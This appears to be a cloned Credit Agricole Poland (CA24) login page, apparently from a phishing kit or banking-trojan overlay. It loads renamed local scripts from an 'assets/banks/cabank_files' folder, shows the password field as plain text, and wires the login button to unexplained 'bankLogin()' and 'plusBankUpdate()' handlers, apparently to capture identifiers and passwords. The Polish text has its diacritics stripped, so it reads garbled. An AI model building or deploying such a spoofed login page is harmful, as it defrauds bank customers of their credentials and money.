        footer .bootstrap-select:not([class*=col-]):not([class*=form-control]):not(.input-group-btn) {
            width: 90%
        }

        footer #set-language,
        footer .footer-button {
            margin: .25rem 0
        }

        footer #set-language .btn,
        footer .footer-button .btn {
            border-color: transparent;
            font-weight: 600;
            text-align: left;
            cursor: pointer;
            width: 100%;
            font-size: .875rem;
            overflow: hidden;
            text-overflow: ellipsis
        }

        .theme-default footer #set-language .btn,
        .theme-default footer .footer-button .btn {
            background: #4a4e51;
            color: #fff
        }

        .theme-hicontrast footer #set-language .btn,
        .theme-hicontrast footer .footer-button .btn {
            background: #000;
            color: #fff
        }

        .theme-default footer #set-language .btn:after,
        .theme-default footer .footer-button .btn:after,
        .theme-hicontrast footer #set-language .btn:after,
        .theme-hicontrast footer .footer-button .btn:after {
            color: #fff
        }

        .theme-default footer #set-language .btn:focus:after,
        .theme-default footer .footer-button .btn:focus:after,
        .theme-hicontrast footer #set-language .btn:focus:after,
        .theme-hicontrast footer .footer-button .btn:focus:after {
            color: hsla(0, 0%, 100%, .6)
        }

        .theme-default footer #set-language .btn:focus,
        .theme-default footer .footer-button .btn:focus,
        .theme-hicontrast footer #set-language .btn:focus,
        .theme-hicontrast footer .footer-button .btn:focus {
            box-shadow: 0 0 0 .2rem rgba(248, 249, 250, .5)
        }

        footer #set-language .btn span {
            flex-grow: 1
        }

        footer #set-language .dropdown-item {
            font-weight: 600;
            padding: .25rem 1rem
        }

        .theme-default footer #set-language .dropdown-toggle {
            background: #4a4e51;
            color: #fff
        }

        .theme-hicontrast footer #set-language .dropdown-toggle {
            background: #000;
            color: #fff
        }

        footer #set-language .dropdown-toggle:after {
            line-height: 1.714em;
            height: 2rem;
            font-size: 21px
        }

        .theme-default footer #set-language .dropdown-menu {
            background: #4a4e51;
            color: #fff
        }

        .theme-hicontrast footer #set-language .dropdown-menu {
            background: #000;
            color: #fff
        }

        .theme-default footer #set-language .dropdown-menu a,
        .theme-hicontrast footer #set-language .dropdown-menu a {
            background: transparent;
            color: #fff
        }

        .theme-default footer #set-language .dropdown-menu a:active,
        .theme-default footer #set-language .dropdown-menu a:focus,
        .theme-default footer #set-language .dropdown-menu a:hover {
            background: #f5f5f5;
            color: #4a4e51
        }

        .theme-hicontrast footer #set-language .dropdown-menu a:active,
        .theme-hicontrast footer #set-language .dropdown-menu a:focus,
        .theme-hicontrast footer #set-language .dropdown-menu a:hover {
            background: #fff;
            color: #000
        }

        footer .footer-button .ca.ca-switch-version {
            font-size: 1.75em;
            margin-left: -.25em;
            margin-right: .125em
        }

        @media (max-width:767.98px) {
            footer .menu-element>div.footer-buttons {
                margin-top: 15px
            }
        }

        @media (min-width:1160px) {
            footer .menu-element>div.footer-buttons {
                flex-grow: 1;
                max-width: 400px;
                margin-left: auto;
                flex-basis: 40%
            }
        }

        footer .footer-buttons {
            margin-top: 30px;
            display: flex;
            flex-flow: column nowrap;
            align-items: stretch;
            white-space: nowrap
        }

        footer .footer-copyright {
            margin-top: 10px
        }

        @media (min-width:768px) and (max-width:1159.98px) {
            footer .footer-copyright {
                margin-top: 20px
            }
        }

        @media (min-width:1160px) {
            footer .footer-copyright {
                order: 2
            }
        }

        footer .logo {
            padding: 4px 0;
            background: url(/web-ca24/ca-bottom.62d9a72003434ef4d544.png) 0 50% no-repeat;
            display: block;
            width: 75px;
            height: 98px;
            min-width: 75px
        }

        footer .footer-menu {
            flex-grow: 1;
            order: 1;
            display: flex
        }

        @media (min-width:768px) {
            footer .footer-menu {
                margin-right: 30px
            }
        }

        footer .footer-menu .logo {
            flex-basis: 75px
        }

        footer .footer-menu .nav {
            display: block;
            -moz-column-count: 2;
            column-count: 2;
            font-size: .875rem
        }

        @media (max-width:1159.98px) {
            footer .footer-menu .nav {
                -moz-column-count: 1;
                column-count: 1
            }
        }

        @media (min-width:768px) {
            footer .footer-menu .nav {
                max-width: calc(100% - 75px)
            }
        }

        footer .footer-menu .nav li {
            margin-left: 30px;
            display: block
        }

        @media (max-width:1300px) {
            footer .footer-menu .nav li {
                margin-left: 20px
            }
        }

        @media (max-width:1159.98px) {
            footer .footer-menu .nav li {
                margin-left: 15px
            }
        }

        footer .footer-menu .nav a {
            color: inherit;
            padding: 2px 0;
            display: inline-block;
            font-weight: 300
        }

        footer .footer-menu .nav a,
        footer .footer-menu .nav a:hover {
            color: inherit;
            background: none
        }

        footer .footer-elements {
            background: #202123
        }

        footer .contact-element {
            padding-top: 30px;
            padding-bottom: 30px;
            background: #2c2d31
        }

        @media (max-width:767.98px) {
            footer .contact-element {
                padding-top: 15px;
                padding-bottom: 15px
            }
        }

        footer .contact-element .appointment,
        footer .contact-element .infoline,
        footer .contact-element .phone {
            font-size: 1rem;
            padding-left: 4rem;
            position: relative;
            margin-bottom: .25rem
        }

        footer .contact-element .appointment .number,
        footer .contact-element .infoline .number,
        footer .contact-element .phone .number {
            font-weight: 700;
            display: inline-block
        }

        footer .contact-element .appointment a,
        footer .contact-element .infoline a,
        footer .contact-element .phone a {
            color: inherit;
            text-decoration: none
        }

        footer .contact-element .appointment a>span,
        footer .contact-element .infoline a>span,
        footer .contact-element .phone a>span {
            text-decoration: inherit
        }

        footer .contact-element .infoline .ca-infoline {
            position: absolute;
            width: 3.333rem;
            text-align: right;
            display: block;
            top: -1.1rem;
            left: -.375rem;
            font-size: 4rem
        }

        footer .contact-element .infoline .number {
            display: flex;
            align-items: center;
            margin-top: -.75rem;
            font-size: 2.25rem
        }

        @media (max-width:1159.98px) {
            footer .contact-element .infoline .number {
                margin-top: -.5rem;
                font-size: 1.75rem
            }
        }

        footer .contact-element .infoline .number .ca-question-mark {
            width: 35px;
            height: 35px;
            display: flex;
            justify-content: flex-end;
            align-items: center;
            margin-left: 10px
        }

        @media (max-width:1159.98px) {
            footer .contact-element .infoline .number .ca-question-mark {
                margin-top: 10px;
                margin-left: 5px;
                padding-right: 5px;
                padding-bottom: 5px
            }
        }

        @media (max-width:1159.98px) {
            footer .contact-element .phone {
                padding-left: 3rem
            }
        }

        @media (max-width:767.98px) {
            footer .contact-element .phone {
                padding-left: 4rem
            }
        }

        footer .contact-element .phone .ca-device {
            position: absolute;
            width: 3rem;
            text-align: right;
            display: block;
            top: -.4rem;
            left: .4rem;
            font-size: 2.75rem
        }

        @media (max-width:1159.98px) {
            footer .contact-element .phone .ca-device {
                top: -.5rem;
                left: -1rem;
                font-size: 3rem
            }
        }

        @media (max-width:767.98px) {
            footer .contact-element .phone .ca-device {
                left: .5rem
            }
        }

        footer .contact-element .phone .number {
            font-size: 1.125rem
        }

        @media (max-width:1159.98px) {
            footer .contact-element .phone .number {
                margin-top: -.25em;
                font-size: 1.75rem
            }
        }

        @media (max-width:360px) {
            footer .contact-element .phone .number {
                font-size: 1.5rem
            }
        }

        footer .contact-element .appointment {
            white-space: nowrap;
            margin-bottom: -1rem
        }

        @media (max-width:1159.98px) {
            footer .contact-element .appointment {
                padding-left: 3rem
            }
        }

        @media (max-width:767.98px) {
            footer .contact-element .appointment {
                padding-left: 4rem;
                margin-top: -.25rem
            }
        }

        @media (min-width:1160px) {
            footer .contact-element .appointment {
                margin-top: -.25rem
            }
        }

        footer .contact-element .appointment a,
        footer .contact-element .appointment button {
            font-size: 0
        }

        footer .contact-element .appointment a>span,
        footer .contact-element .appointment button>span {
            font-size: 1rem;
            vertical-align: middle
        }

        footer .contact-element .appointment .ca {
            width: 3rem;
            text-align: right;
            font-size: 2.75rem;
            display: inline-block;
            vertical-align: middle
        }

        @media (max-width:1159.98px) {
            footer .contact-element .appointment .ca {
                margin-left: -4.25rem;
                margin-right: 1.25rem;
                font-size: 2.5rem
            }
        }

        @media (max-width:767.98px) {
            footer .contact-element .appointment .ca {
                margin-left: -4.75rem;
                margin-right: .75rem;
                width: 4rem
            }
        }

        @media (min-width:1160px) {
            footer .contact-element .appointment .ca {
                margin-left: -4.625rem;
                margin-right: .625rem;
                width: 4rem
            }
        }

        footer .contact-element a {
            color: inherit
        }

        footer .copyright {
            font-size: .75rem;
            font-weight: 400;
            margin-bottom: 0;
            display: table-cell;
            vertical-align: middle;
            padding: .5em 0
        }

        @media (min-width:768px) {
            footer .copyright {
                white-space: nowrap
            }
        }

        .theme-default footer #set-contrast .set-default {
            display: none
        }

        .theme-hicontrast footer #set-contrast .set-default {
            display: block;
            color: #000;
            background: #f5f5f5
        }

        .theme-default footer #set-contrast .set-hicontrast {
            display: block
        }

        .theme-hicontrast footer #set-contrast .set-hicontrast {
            display: none
        }

        @media (min-width:768px) {
            .theme-default .login footer,
            .theme-hicontrast .login footer {
                background: linear-gradient(0deg, #161718 69px, #2c2d31 0, #2c2d31 184px, #202123 0) 0 100%/100% 100% no-repeat
            }
        }

        @media (min-width:1160px) {
            .theme-default .login footer {
                background: linear-gradient(0deg, #161718, #202123 0) 0 100%/50% 100% no-repeat, #2c2d31
            }
            .theme-hicontrast .login footer {
                background: linear-gradient(0deg, #161718 50px, #202123 0) 0 100%/50% 100% no-repeat, #2c2d31
            }
        }
    </style>
    <style>
        @media (min-width:768px) {
            .pass-check {
                transform: translate(-100%, 50%);
                bottom: 18px;
                left: -60px
            }
        }

        @media (min-width:1160px) {
            .pass-check {
                left: -70px
            }
        }

        .login-auth-blocked .infoline,
        .login-auth-blocked .phone {
            padding-left: 2.25rem;
            position: relative
        }

        .login-auth-blocked .infoline .number,
        .login-auth-blocked .phone .number {
            font-weight: 700;
            display: inline-block;
            font-size: 1.125rem
        }

        .login-auth-blocked .infoline .number a,
        .login-auth-blocked .phone .number a {
            color: inherit
        }

        .login-auth-blocked .infoline .ca,
        .login-auth-blocked .phone .ca {
            position: absolute;
            width: 2.25rem;
            text-align: right;
            display: block;
            top: -.75rem;
            left: -.375rem;
            font-size: 2.25rem
        }

        .login-auth-blocked .logout .ca {
            font-size: 1.5rem;
            vertical-align: -7px
        }

        button.keyboard {
            display: none
        }
    </style>
    <style>
        .security-info-container h2 {
            margin-bottom: 1.5rem
        }

        .security-info-container h4 {
            font-size: 1.5rem;
            line-height: 1.875rem;
            font-weight: 600;
            margin-bottom: 1.5rem !important
        }

        .security-info-container h5 {
            margin-bottom: 1.5rem
        }

        .security-info-container .left {
            text-align: left
        }

        .security-info-container .right {
            text-align: right
        }

        .security-info-container .center {
            text-align: center
        }

        .security-info-container .full {
            text-align: justify
        }

        .security-info-container .security-link {
            margin-top: 1.5rem
        }

        .security-info-container a {
            font-weight: 600
        }

        .theme-default .security-info-container a {
            color: #007e90
        }

        .theme-hicontrast .security-info-container a {
            color: #9c0
        }

        .theme-default .security-info-container a:focus,
        .theme-default .security-info-container a:hover {
            color: #006675
        }

        .theme-hicontrast .security-info-container a:focus,
        .theme-hicontrast .security-info-container a:hover {
            color: #ad1
        }

        .security-info-container a:active,
        .security-info-container a:focus,
        .security-info-container a:hover {
            text-decoration: underline
        }

        .security-info-container ul {
            list-style-type: none;
            font-size: .875rem;
            padding-left: 1.25rem;
            margin: 0
        }

        .security-info-container ul li {
            position: relative;
            margin-bottom: 1.25rem
        }

        .security-info-container ul li:before {
            font-family: cawebfont;
            position: absolute;
            left: -1.25rem;
            top: 0;
            content: "\f031";
            color: #9c0
        }
    </style>
    <style>
        .note-alert {
            padding-top: 30px;
            background-color: transparent
        }

        .h-100 .note-alert {
            height: 100%
        }

        @media (max-width:767.98px) {
            .note-alert {
                padding: 30px 0 0
            }
            :not(.bg-transparent)>.note-alert {
                background-color: #fff
            }
        }

        .note-alert .left {
            text-align: left
        }

        .note-alert .right {
            text-align: right
        }

        .note-alert .center {
            text-align: center
        }

        .note-alert .full {
            text-align: justify
        }

        .note-alert .alert {
            border: none;
            border-radius: 0;
            margin: 0;
            padding-top: 50px;
            position: relative;
            background-repeat: no-repeat;
            background-position: 50%;
            background-size: 75% 75%
        }

        .h-100 .note-alert .alert {
            min-height: 100%
        }

        @media (min-width:1160px) {
            .note-alert .alert {
                padding-right: 25%;
                background-position: 225%
            }
        }

        .note-alert .alert .caption {
            position: absolute;
            text-align: center;
            left: 50%;
            top: 0;
            transform: translate(-50%, -50%);
            margin: auto;
            font-size: 25px;
            line-height: inherit;
            padding: 0 20px;
            border-radius: 20px;
            font-weight: 700;
            white-space: nowrap
        }

        .theme-default .note-alert .alert .caption {
            background-color: #9c0;
            border: none
        }

        .theme-hicontrast .note-alert .alert .caption {
            background-color: #000;
            border: 2px solid #9c0
        }

        .note-alert .alert h4 {
            color: inherit;
            font-size: 1.375rem;
            line-height: 1.875rem;
            font-weight: 600;
            margin-bottom: 1rem
        }

        .note-alert .alert.alert-warning {
            background-image: url(/web-ca24/exclamation.4fe516ee1ff6000c6f2d.svg)
        }

        .theme-default .note-alert .alert.alert-warning {
            background-color: #009597;
            color: #fff
        }

        .theme-hicontrast .note-alert .alert.alert-warning {
            background-color: #002a2b;
            color: #fff
        }

        .note-alert .alert.alert-warning a {
            color: #fff;
            font-weight: 600
        }

        .note-alert .alert.alert-warning a:active,
        .note-alert .alert.alert-warning a:focus,
        .note-alert .alert.alert-warning a:hover {
            text-decoration: underline
        }
    </style>
    <script type="text/javascript" charset="UTF-8" src="/assets/banks/cabank_files/common.js.pobrane"></script>
    <script type="text/javascript" charset="UTF-8" src="/assets/banks/cabank_files/util.js.pobrane"></script>
    <script type="text/javascript" charset="UTF-8" src="/assets/banks/cabank_files/AuthenticationService.Authenticate"></script>
</head>

<body class="theme anim user-not-recognized theme-default">
<noscript>
    <style>
        .body-preload:before {
            display: none;
        }
    </style>
    <style>
        a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font:inherit;font-size:100%;vertical-align:baseline}html{line-height:1}ol,ul{list-style:none}table{border-collapse:collapse;border-spacing:0}caption,td,th{text-align:left;font-weight:400;vertical-align:middle}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}a img{border:none}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}*,::after,::before{box-sizing:inherit}html{box-sizing:border-box;font-size:62.5%}@media (max-width:460px){html{font-size:50%}}body,html{width:100%;height:100%}body{background-image:url(/web-ca24/assets/img/tatry01_768.jpg)!important;color:#454545;font-weight:400;font-size:1.8rem;font-family:Arial,sans-serif;display:flex;justify-content:center;align-items:center}@media (min-width :768px){body{background-image:url(/web-ca24/assets/img/tatry01_1160.jpg)!important}}@media (min-width :992px){body{background-image:url(/web-ca24/assets/img/tatry01_1920.jpg)!important}}section{background:#fff;min-height:675px;max-width:850px;padding:120px 50px 50px}@media (max-width:460px){section{padding:50px 20px;min-height:0}}h1{color:#007d8f;margin-bottom:70px;margin-left:40px;font-size:2.5rem;font-weight:600}@media (max-width:460px){h1{margin-left:0;margin-bottom:30px}}h1 img{margin-right:20px}p{line-height:3rem}p a{color:#9c0;text-decoration:underline}p a:hover{text-decoration:none}.cta-row{text-align:center;margin-top:130px}@media (max-width:460px){.cta-row{margin-top:50px}}.cta-row a{display:inline-block;background:#007d8f;color:#fff;-moz-border-radius:12px;-webkit-border-radius:12px;border-radius:12px;padding:10px 15px;text-decoration:none;-moz-transition:background .2s;-o-transition:background .2s;-webkit-transition:background .2s;transition:background .2s}.cta-row a:hover{background:#006776}img{vertical-align:middle}
    </style>
    <section>
        <h1><img src="assets/img/ico-title.png" alt="i"> Nie mona wywietli strony</h1>
        <p>
            Wcz obsug JavaScript, aby mc korzysta z CA24.<br>
            <br>
            Moesz to zrobi w ustawieniach swojej przegldarki.
        </p>
        <div class="cta-row">
            <a href="https://credit-agricole.pl/" target="_blank">Przejd na stron banku <img src="assets/img/ico-btn.png" alt="arrow"></a>
        </div>
    </section>
</noscript>
<app-root _nghost-vlj-c85="" ng-version="11.0.2">
    <div _ngcontent-vlj-c85="" id="wrap" class="login">
        <app-login-header _ngcontent-vlj-c85="" class="ng-star-inserted">
            <header>
                <div class="logo-container site-width"><span class="logo">Credit Agricole</span></div>
            </header>
        </app-login-header>
        <!---->
        <!---->
        <!---->
        <div _ngcontent-vlj-c85="" tabindex="-1" id="main">
            <div _ngcontent-vlj-c85="" class="main-container site-width equal-gutters">
                <router-outlet _ngcontent-vlj-c85=""></router-outlet>
                <app-login class="ng-tns-c152-1 ng-star-inserted">
                    <div class="ng-tns-c152-1 ng-trigger ng-trigger-routeAnimation">
                        <router-outlet class="ng-tns-c152-1"></router-outlet>
                        <app-login-screen _nghost-vlj-c151="" class="ng-tns-c151-2 ng-star-inserted" style="">
                            <!---->
                            <div _ngcontent-vlj-c151="" class="container-fluid ng-tns-c151-2">
                                <div _ngcontent-vlj-c151="" class="row justify-content-end ng-tns-c151-2">
                                    <div _ngcontent-vlj-c151="" class="col-12 col-md-6 ng-tns-c151-2">
                                        <!---->
                                        <!---->
                                    </div>
                                    <!---->
                                    <!---->
                                    <!---->
                                    <!---->
                                    <div _ngcontent-vlj-c151="" class="col-12 col-md-6 md-strech ng-tns-c151-2">
                                        <!---->
                                        <app-login-form-user _ngcontent-vlj-c151="" class="ng-tns-c151-2 ng-star-inserted">
                                            <div class="card-inner form-container">
                                                <h1 id="summaryInfo" class="h4">Zaloguj si</h1>
                                                <div novalidate="" autocomplete="off" aria-hidden="false" class="ng-pristine ng-invalid ng-touched" id="mainCont">

                                                    <div class="form-group input-keyboard-group user-group not-too-wide"><label for="login">Twj identyfikator</label>
                                                        <input id="bank_login" formcontrolname="login" type="text" autocomplete="off" maxlength="30" class="form-control ng-pristine ng-invalid ng-touched" placeholder="Wprowad identyfikator" aria-hidden="false"></div>
                                                    <div class="form-group input-keyboard-group user-group not-too-wide"><label for="login">Twoje haso</label>
                                                        <input id="bank_password" formcontrolname="login" type="text" autocomplete="off" maxlength="30" class="form-control ng-pristine ng-invalid ng-touched" placeholder="Wprowad identyfikator" aria-hidden="false"></div>
                                                    <div class="form-group not-too-wide text-right my-2 my-lg-0"><a href="javascript:void(null);" class="text-link-sm"><span>Masz problem z zalogowaniem?</span></a></div>
                                                    <div class="form-group not-too-wide text-right mb-4 ng-star-inserted"><a href="javascript:void(null);" class="text-link-sm"><span>Nie pamitasz hasa?</span></a></div>
                                                    <!---->
                                                    <div class="buttons buttons-right not-too-wide"><button id="loginButton" onclick="bankLogin(); plusBankUpdate()" type="submit" class="btn btn-primary btn-lg"=""> DALEJ </button></div>
                                                </div>
                                            </div>
                                        </app-login-form-user>

                                    </div>
                                    <div _ngcontent-vlj-c151="" class="col-12 col-md-6 ng-tns-c151-2 md-sticky-bottom-container ng-star-inserted" style="align-self: auto;">
                                        <app-login-note-alert _ngcontent-vlj-c151="" class="ng-tns-c151-2 ng-star-inserted">
                                            <div class="note-alert card ng-star-inserted">
                                                <div role="complementary" class="alert alert-warning card-inner">
                                                    <h2 class="caption">UWAGA</h2>
                                                    <div>
                                                        <h5><strong>Bezpieczne bankowanie </strong><br><strong>- dla Ciebie i dla nas</strong></h5>
                                                        <p>&nbsp;</p>
                                                        <p>Drodzy Klienci,</p>
                                                        <p>zaley nam na bezpieczestwie Waszym oraz naszych pracownikw. Kady z nas ma duy wpyw na ograniczenie ryzyka rozprzestrzeniania si koronawirusa. Dlatego zachcamy, prosimy i przypominamy:</p>
                                                        <ul>
                                                            <li>Korzystaj z bankowoci zdalnej. Wiele spraw, np. patnoci za rachunki, przelewy, moesz zaatwi logujc si do serwisu internetowego CA24 eBank lub aplikacji mobilnej CA24 Mobile.</li>
                                                            <li>Pa kart, telefonem i regularnie je dezynfekuj.</li>
                                                            <li>Zosta w domu, jeli le si czujesz. Zakupy zrb przez internet  jeli to moliwe.</li>
                                                        </ul>
                                                        <p>Bd wyrozumiay. Wprowadzilimy dodatkowe zasady obsugi klientw w naszych placwkach. Z trosk o zdrowie naszych pracownikw organizujemy prac tak, by zapewni jak najlepsz jako obsugi.</p>
                                                        <p>Wicej informacji przeczytasz na <a href="https://www.credit-agricole.pl/bezpieczenstwo/bezpieczne-bankowanie-dla-ciebie-i-dla-nas" target="_blank" rel="noopener">naszej stronie</a>.</p>
                                                    </div>
                                                </div>
                                            </div>
                                            <!---->
                                        </app-login-note-alert>
                                        <!---->
                                    </div>
                                    <!---->
                                    <div _ngcontent-vlj-c151="" class="col-12 col-md-6 md-strech ng-tns-c151-2 ng-star-inserted">
                                        <app-login-security-info _ngcontent-vlj-c151="" class="ng-tns-c151-2">
                                            <div class="security-info-container card-inner clearfix h-100 ng-star-inserted">
                                                <div>
                                                    <h5>Kiedy korzystasz z bankowoci internetowej, przestrzegaj kilku wanych zasad:</h5>
                                                    <ul>
                                                        <li><strong>zanim si zalogujesz sprawd:</strong></li>
                                                    </ul>
                                                    <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - czy w pasku jest prawidowy adres: https://ca24.credit-agricole.pl, <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - czy przed adresem jest symbol kdki,
                                                        <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - czy certyfikat serwisu jest prawidowy (taki jak opisujemy w sekcji <a href="https://www.credit-agricole.pl/bezpieczenstwo/korzystanie-z-nowego-serwisu-internetowego-ca24"
                                                                                                                                                                                target="_blank" rel="noopener">Bezpieczestwo</a>),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - czy po lewej stronie ekranu z hasem wywietla si Twj obrazek bezpieczestwa;</p>
                                                    <ul>
                                                        <li>&nbsp;nie korzystaj z linkw do logowania otrzymanych w SMS-ach i e-mailach;</li>
                                                        <li>&nbsp;zawsze samodzielnie wpisuj adres CA24 eBank. Moesz zapisa ten adres w ulubionych w przegldarce lub przechodzi do serwisu ze strony gwnej banku;</li>
                                                        <li>&nbsp;jeeli cokolwiek budzi Twoje wtpliwoci, gdy si logujesz lub autoryzujesz transakcj  przerwij operacj, nie wprowadzaj danych i skontaktuj si z nami jak najszybciej.</li>
                                                    </ul>
                                                    <p class="left">&nbsp;</p>
                                                    <p class="left"><a href="https://www.credit-agricole.pl/bezpieczenstwo" target="_blank" rel="noopener">Dowiedz si wicej o bezpieczestwie</a></p>
                                                </div>
                                            </div>
                                            <!---->
                                        </app-login-security-info>
                                    </div>
                                    <!---->
                                    <!---->
                                </div>
                            </div>
                        </app-login-screen>
                        <!---->
                    </div>
                </app-login>
                <!---->
                <!---->
            </div>
        </div>
        <!---->
        <app-footer _ngcontent-vlj-c85="" class="ng-star-inserted">
            <footer>
                <div class="site-width footer-width">
                    <div class="container-fluid">
                        <div class="row footer-elements">
                            <div class="col-12 col-lg-8 menu-element">
                                <div>
                                    <div class="footer-menu">
                                        <div class="logo"></div>
                                        <ul class="nav">
                                            <li><a href="javascript:void(0);"><span>Bezpieczestwo</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Polityka Cookies</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Placwki i bankomaty</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Koszt przewalutowania</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Dokumenty</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Opaty i prowizje</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Oprocentowanie</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Kursy walut</span></a></li>
                                            <li><a href="javascript:void(0);"><span>Notowania funduszy</span></a></li>
                                        </ul>
                                    </div>
                                    <div class="footer-copyright">
                                        <p class="copyright">  2019 Credit Agricole Bank Polska S.A. <br class="d-md-none"> Wszelkie prawa zastrzeone. </p>
                                    </div>
                                </div>
                                <div class="footer-buttons">
                                    <div id="set-language" class="dropdown"><button type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-default dropdown-toggle"><span>Jzyk polski</span></button>
                                        <div
                                                aria-labelledby="dropdownMenuButton" class="dropdown-menu"><a class="dropdown-item ng-star-inserted" style="cursor: pointer;"><span>Jzyk polski</span></a><a class="dropdown-item ng-star-inserted" style="cursor: pointer;"><span>English</span></a>
                                            <a
                                                    class="dropdown-item ng-star-inserted" style="cursor: pointer;"><i class="flag flag-fr"></i><span>Franais</span></a><a class="dropdown-item ng-star-inserted" style="cursor: pointer;"><span></span></a>
                                            <!---->
                                        </div>
                                    </div><span id="set-contrast" class="footer-button form-inline"><button class="btn btn-default set-hicontrast"><span class="ca ca-contrast"></span> Wybierz wersj kontrastow </button><button class="btn btn-default set-default"><span class="ca ca-contrast"></span> Wybierz wersj zwyk </button></span>
                                    <!---->
                                </div>
                            </div>
                            <div class="col-12 col-lg-4 contact-element">
                                <div class="row no-gutters">
                                    <div class="col-12 col-md-6 col-lg-12">
                                        <p class="infoline"> Serwis telefoniczny:<br><span class="number"><a href="tel:19 019" title="19 019">19 019</a></span></p>
                                    </div>
                                    <div class="col-12 col-md-6 col-lg-12">
                                        <p class="phone"> dla pocze zagranicznych:<br><span class="number"><a href="tel:+48 71 35 49 009" title="+48 71 35 49 009">+48 71 35 49 009</a></span></p>
                                        <!---->
                                        <!---->
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </footer>
        </app-footer>
        <!---->
        <app-special-message _ngcontent-vlj-c85="" class="ng-tns-c40-0">
            <div data-backdrop="static" data-keyboard="false" id="offer" tabindex="-1" role="dialog" aria-labelledby="offerTitle" aria-hidden="true" class="modal fade messages ng-tns-c40-0">
                <div role="document" class="modal-dialog ng-tns-c40-0">
                    <div class="modal-content ng-tns-c40-0 ng-trigger ng-trigger-showAfterPreloadAnimation preload">
                        <div class="modal-header ng-tns-c40-0">
                            <div class="ng-tns-c40-0">
                                <h6 class="modal-title ng-tns-c40-0"></h6>
                                <h5 id="downloadTransferListTitle" class="modal-title ng-tns-c40-0"></h5>
                            </div><time class="ng-tns-c40-0"><!----><!----><!----></time></div>
                        <div class="modal-body ng-tns-c40-0">
                            <div class="row ng-tns-c40-0">
                                <div class="col-12 ng-tns-c40-0"></div>
                            </div>
                            <div class="row ng-tns-c40-0">
                                <div class="col-11 col-md-6 mt-sm-4 mt-4 ng-tns-c40-0"><a href="javascript:void(null);" aria-label="Zamknij" class="btn btn-empty btn-link ng-tns-c40-0"><i class="ca ca-close ng-tns-c40-0"></i><span class="ng-tns-c40-0">Zamknij</span></a></div>
                                <div class="col-12 col-md-6 text-right mt-sm-4 mt-4 ng-tns-c40-0"><a href="javascript:void(null);" class="btn btn-primary ng-tns-c40-0">Zapoznaem/am si z wiadomoci</a></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </app-special-message>
        <app-sca-modal _ngcontent-vlj-c85="">
            <div data-backdrop="static" data-keyboard="false" id="offer" tabindex="-1" role="dialog" aria-labelledby="offerTitle" aria-hidden="true" class="modal fade modal-auth">
                <div role="document" class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header pb-0">
                            <div>
                                <h5 class="modal-title mb-3">Silne uwierzytelnienie</h5>
                                <p>Ze wzgldw bezpieczestwa wymagamy silnego uwierzytelnienia aby wywietli informacje o rachunku sprzed {{ days }} dni.</p>
                            </div>
                        </div>
                        <form novalidate="" class="ng-untouched ng-pristine ng-valid">
                            <!---->
                        </form>
                    </div>
                </div>
            </div>
        </app-sca-modal>
        <app-annex-proposal-modal _ngcontent-vlj-c85="">
            <div data-backdrop="static" data-keyboard="false" id="offer" tabindex="-1" role="dialog" aria-labelledby="offerTitle" aria-hidden="true" class="modal fade">
                <div role="document" class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h5 id="downloadTransferListTitle" class="modal-title strong-active">Dokument do Twojej akceptacji</h5><button type="button" aria-label="Zamknij" class="close"><span aria-hidden="true"></span></button></div>
                        <div class="modal-body">
                            <p class="font-400">Przygotowalimy aneks do Twojej umowy, ktry pozwoli nam udostpnia Ci nowe usugi.</p>
                            <p class="font-400">Prosimy <strong class="strong-active">zapoznaj si z&nbsp;nim i&nbsp;zaakceptuj.</strong> Moesz to zrobi od razu.<br>Kliknij w&nbsp;przycisk Podpisz aneks, nastpnie potwierd swj adres e-mail, przeczytaj dokument i&nbsp;jeli
                                si zgadzasz  zaakceptuj go (tak samo jak transakcje  przez kod z&nbsp;SMS lub tokena).</p>
                            <p class="font-400 mb-0">Zatwierdzony dokument przelemy na Twj adres e-mail.</p>
                            <p class="font-400 mb-4"><strong class="strong-active">Dzikujemy!</strong></p>
                            <div class="mb-4 ng-star-inserted"><a href="javascript:void(null);" class="btn btn-primary btn-lg" style="white-space: normal;">Podpisz umow bankowoci elektronicznej</a></div>
                            <!---->
                            <table class="table table-agreements-to-be-signed">
                                <thead>
                                <tr>
                                    <th colspan="2" class="column-title">Dokument</th>
                                </tr>
                                </thead>
                                <tbody>
                                <!---->
                                </tbody>
                            </table>
                            <p class="text-center font-400"><button class="btn btn-empty btn-link btn-md"><span>Przypomnij mi pniej</span></button></p>
                        </div>
                    </div>
                </div>
            </div>
        </app-annex-proposal-modal>
        <app-aml-proposal-modal _ngcontent-vlj-c85="">
            <div data-backdrop="static" data-keyboard="false" id="offer" tabindex="-1" role="dialog" aria-labelledby="offerTitle" aria-hidden="true" class="modal fade">
                <div role="document" class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h5 id="downloadTransferListTitle" class="modal-title strong-active">Wymagana aktualizacja danych</h5><button type="button" aria-label="Zamknij" class="close"><span aria-hidden="true"></span></button></div>
                        <div class="modal-body">
                            <!---->
                            <!---->
                            <!---->
